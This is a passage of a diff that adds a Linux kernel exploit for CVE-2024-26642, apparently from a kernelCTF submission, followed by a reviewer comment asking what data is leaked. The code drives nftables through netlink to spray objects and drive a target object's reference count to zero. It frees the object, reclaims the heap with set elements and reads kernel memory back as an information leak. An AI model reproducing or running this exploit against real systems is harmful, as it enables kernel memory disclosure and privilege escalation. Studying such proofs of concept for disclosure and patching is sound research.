pocs/linux/kernelctf/CVE-2024-26642_cos/exploit/cos-105-17412.294.23/exploit.c

```diff
@@ -0,0 +1,502 @@
+    char *table = "table for leak";
+    new_table(socket, table);
+    new_obj_ct_expect(socket, table, obj_for_leak, NULL, 0);
+    
+    new_set_pipapo(socket,table, pipapo_set, 0x40, NFT_OBJECT_CT_EXPECT);
+    new_set_hashtable_with_map(socket, table, hash_set, 8);
+    new_set_hashtable(socket, table, hash_set_2, NFT_OBJECT_CT_EXPECT, 8);
+    char *key = malloc(0x40);
+    char *key_end = malloc(0x40);
+    uint64_t hash_key;
+    
+    nl_socket_modify_cb(socket,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_setelem, NULL);
+    
+    //step 1
+    //spray some nft_object which type is  NFT_OBJECT_CT_EXPECT
+    char *pad = malloc(0x100);
+    memset(pad,0x41,0x100);
+    char *obj_name = malloc(0x40);
+    memset(obj_name,0,0x40);
+    
+    for(i=0;i<0x40;i++){
+        snprintf(obj_name,0x40,"obj_for_leak_%d",i);
+        new_obj_ct_expect(socket, table, obj_name, NULL, 0);
+    }
+    //step 2
+    //make target_obj->use = 0xa5
+    
+    for(i=0;i<0xa4;i++){
+    	memset(key,i,0x40);
+        memset(key_end,i,0x40);
+        new_setelem(socket, table, pipapo_set, pad, 0x100, target_obj, key, 0x40, key_end, 0x40, 0);
+    }
+    hash_key = 0xdeadbeef;
+    new_setelem(socket, table, hash_set_2, pad, 0x100, target_obj, &hash_key, 8, NULL, 0, 0);
+    //step 3
+    //make target_obj->use = 0xa5 - 0xa5 = 0
+    primitive_0(socket, table, target_obj, 0xa5);
+    sleep(2);
+    
+    //step 4
+    //delete target obj
+    del_obj(socket, table, target_obj, NFT_OBJECT_CT_EXPECT);
+    sleep(2);
+    //step 5
+    //get heap back
+    for(i=0;i<0x1000;i++){
+        //printf("%d\n",i);
+        *(uint64_t *)pad = i;
+        hash_key = i;
+        new_setelem_with_elemdata(socket, table, hash_set, pad, 0xa1, &hash_key, 8, NULL, 0,0);
+    }
+    //step 6
+    //call elem_flush to free all the elements of the pipapo set,  make setelem->udata_len = 0xfc
+    elem_flush(socket, table, pipapo_set);
+    sleep(2);
+    //step 7 Get leak data
+    
+    struct nl_sock * socket2 = nl_socket_alloc();
+    if(nfnl_connect(socket2)<0){
+        printf("nfnl_connect fail!\n");
+        return 0;
+    }
+    //function nl_callback_find_target_setelem will be called once we call nl_recvmsgs_default
+    //check the api documents and the source code for details:
+    //nl_socket_modify_cb:  https://www.infradead.org/~tgr/libnl/doc/api/group__socket.html#gaeee66d6edef118209c7e7f1e3d393448
+    //nl_recvmsgs_default:  https://www.infradead.org/~tgr/libnl/doc/api/group__send__recv.html#ga49b150fbb38a00444d5f6e323f05a2a1
+    //setup a callback function which will examine data to find the leaks from step 7
+    nl_socket_modify_cb(socket2,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_setelem, NULL);
+    for(i=0;i<0x1000;i++){
+        hash_key = i;
+        get_setelem(socket2, table, hash_set, &hash_key, 8);
+        nl_recvmsgs_default(socket2);
+        nl_recvmsgs_default(socket2);
+    }
+    uint64_t obj_a = *(uint64_t *)&leak_data[0xcb];
```

Comment:
Comment here what is leaked here exactly (what is the value of `obj_a` and `obj_b`). Which fields of which object is at `0xcb` and `0xcb+8`?